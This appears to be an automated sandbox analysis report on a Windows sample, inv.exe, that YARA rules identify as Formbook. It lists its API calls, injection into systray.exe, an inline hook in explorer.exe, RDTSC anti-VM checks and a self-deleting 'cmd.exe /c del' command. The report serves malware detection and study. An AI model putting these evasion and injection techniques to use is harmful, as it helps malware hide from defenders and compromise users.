          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074A060 NtClose,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00749F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00749FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074A08A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00749FDC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00749FDA NtReadFile,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009881F9
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009743F3
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00998313
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A8418
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_0098845E
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A8538
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009886D2
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00988937
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A2A60
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00988B9C
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00988E10
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A2F80
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009AB025
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A33B0
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009874AF
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A169A
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009876E1
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A98F9
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00987922
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009A3A76
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00987B54
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00987D86
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00987FC7
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0040102F
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D1EF
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041E18E
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041DAA3
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00402D87
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00409E40
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D6FE
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009AC1A3
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009881F9
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009743F3
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00998313
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009A8418
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0098845E
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009A8538
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009886D2
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00988937
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009A2A60
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00988B9C
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00988E10
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009A2F80
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009AB025
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009A33B0
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009874AF
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009AB521
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0481841F
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CD466
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04832581
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D25DD
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0481D5E0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D2D07
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04800D20
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D1D55
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D2EF7
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CD616
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04826E30
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048DDFCE
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D1FF1
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0481B090
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048320A0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D20A8
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D28EC
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048C1002
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048DE824
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480F900
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04824120
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D22AE
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048BFA2B
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0483EBB0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048C03DA
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CDBD2
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D2B28
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D1EF
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074E18E
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074DAAF
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00732D90
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00732D87
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00739E40
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00739E3C
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D6FE
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_00732FB0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 0480B150 appears 45 times
          Source: C:\Users\user\Desktop\inv.exe | Code function: String function: 009721C0 appears 89 times
          Source: C:\Users\user\Desktop\inv.exe | Code function: String function: 00999A17 appears 65 times
          Source: C:\Users\user\Desktop\inv.exe | Code function: String function: 00973A87 appears 38 times
          Source: C:\Users\user\Desktop\inv.exe | Code function: String function: 0099508F appears 59 times
          Source: inv.exe, 00000000.00000003.243748598.0000000002876000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs inv.exe
          Source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamesystray.exej% vs inv.exe
          Source: inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs inv.exe
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/0@19/7
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
          Source: inv.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inv.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: inv.exe | Virustotal: Detection: 42%
          Source: inv.exe | ReversingLabs: Detection: 67%
          Source: unknown | Process created: C:\Users\user\Desktop\inv.exe 'C:\Users\user\Desktop\inv.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inv.exe | Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: inv.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: inv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe, 00000005.00000002.1316093561.00000000047E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe
          Source: inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00972206 push ecx; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041D1EF push ebp; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0040F345 push edi; retf
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041E7C6 push edx; ret
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00972206 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0485D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D0DB push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D085 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D13C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074D1EF push ebp; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074DA9F push cs; iretd
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0073F345 push edi; retf
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0074E7C6 push edx; ret

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA
          Source: C:\Windows\SysWOW64\systray.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\inv.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\inv.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 00000000007398E4 second address: 00000000007398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 0000000000739B5E second address: 0000000000739B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\inv.exe | API coverage: 7.7 %
          Source: C:\Users\user\Desktop\inv.exe | API coverage: 1.8 %
          Source: C:\Windows\SysWOW64\systray.exe | API coverage: 9.1 %
          Source: C:\Windows\explorer.exe TID: 6996 | Thread sleep count: 209 > 30
          Source: C:\Windows\explorer.exe TID: 6996 | Thread sleep time: -418000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6880 | Thread sleep count: 132 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 6880 | Thread sleep time: -264000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264974146.0000000008CC6000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
